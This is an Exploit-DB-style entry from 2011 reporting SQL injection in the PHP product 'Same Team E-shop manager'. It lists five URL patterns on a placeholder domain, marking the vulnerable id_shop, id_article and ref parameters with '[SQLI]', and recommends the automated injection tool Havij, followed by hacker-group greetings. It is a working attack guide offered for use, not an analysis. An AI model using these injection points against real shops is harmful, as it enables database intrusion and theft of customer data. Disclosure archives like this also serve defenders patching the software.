Same Team E-shop manager - SQL Injection

EDB-ID:

17431

CVE:

N/A


Author:

Number 7

Type:

webapps


Platform:

PHP

Date:

2011-06-22


# Exploit Title: [Same Team E-shop manager SQL Injection exploit]
# Date: [19-06-2011]
# Author: [Number 7]
# Software Link: [http://www.sameteam.com.tn/site/fr/eshop-manager.23.html]
# Tested on: [Linux]
_____________________________________________________________________________
exploits:
http://www.domain.com.tn/path/catalogue.php?id_shop=7[SQLI]

http://www.domain.com.tn/path/article.php?id_article=7[SQLI]

http://www.domain.com.tn/path/banniere.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_news.php?id_article=7[SQLI]

http://www.domain.com.tn/path/detail_produit.php?id_shop=3&ref=200308G[SQLI]

----------------------------------------_----------------------------------------


Use Havij :^D it's fastest for the 4th version :D
_____________________________________________________________________________
############ Made in Tunisia +216 ############
[~] Greetz tO: [Shichemt-Älen/Ares/SWAT/S-MAN/Wx #all tunisian hackers]
[~] Home     : Tunisia :^D
############ Made in Tunisia +216 ############